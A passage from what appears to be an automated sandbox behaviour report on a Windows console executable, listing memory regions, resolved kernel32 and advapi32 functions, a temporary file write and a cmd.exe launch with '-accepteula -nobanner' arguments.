|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x01d4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x743b0000 | 0x74441fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:27 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #131: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #131 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "Seyes.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:51, Reason: Child Process |
| Unmonitor | End Time: 00:04:57, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2b8 |
| Parent PID | 0xe4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E10
0x
884
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000870000 | 0x00870000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x0087ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00883fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00891fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00893fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x008b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x009fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x00a03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00be0000 | 0x00c9dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00e00000 | 0x01136fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7f0affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0b0000 | 0x7f0b0000 | 0x7f0d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0d4000 | 0x7f0d4000 | 0x7f0d4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0d9000 | 0x7f0d9000 | 0x7f0dbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0dc000 | 0x7f0dc000 | 0x7f0defff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0df000 | 0x7f0df000 | 0x7f0dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
